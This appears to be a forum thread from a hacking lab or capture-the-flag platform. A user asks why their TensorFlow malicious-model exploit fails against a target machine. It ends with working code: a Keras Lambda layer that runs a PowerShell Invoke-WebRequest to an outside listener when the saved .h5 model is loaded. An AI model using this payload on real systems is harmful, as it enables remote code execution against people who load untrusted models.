Hello.
I read TensorFlow Remote Code Execution with Malicious Model | CyberBlog and try upload some exploit on .111.
But i see File upload failed.
I run listener on casino machine and try execute powershell command in exploit like a Invoke-WebRequest, to see response on listener.
But doesnt wokr. File not upload.
Sometimes file uploaded (i dont know why), but without response.
Please help me understand how to use this exploit correctly.
Hi,
Do you have permissions to write files on the target directory?
Hi. Thanks for responding.
I was just specifying the name of the file to which the model should be written and then calling it by the same name.
Did you have to specify some temporary folder?
Doesnt work. 
I set path to h5 model like a ‘C:\Users\exp.h5’ and ‘C:\TEMP\exp.h5’.
Sometimes file is uploaded, but i dont see response on http.server…
What am I doing wrong?
import tensorflow as tf
def exploit(x):
import os
command = '''powershell -nop -c "Invoke-WebRequest http://10.0.52.31:8080/file_from_your_machine"'''
os.system(command)
return x
model = tf.keras.Sequential()
model.add(tf.keras.layers.Input(shape=(64,)))
model.add(tf.keras.layers.Lambda(exploit))
model.compile()
model.save("C:\TEMP\exploit.h5")
model = tf.keras.models.load_model("C:\TEMP\exploit.h5")